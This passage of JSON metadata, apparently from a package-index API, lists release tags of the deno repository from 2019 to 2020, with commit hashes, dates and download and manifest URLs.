","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tag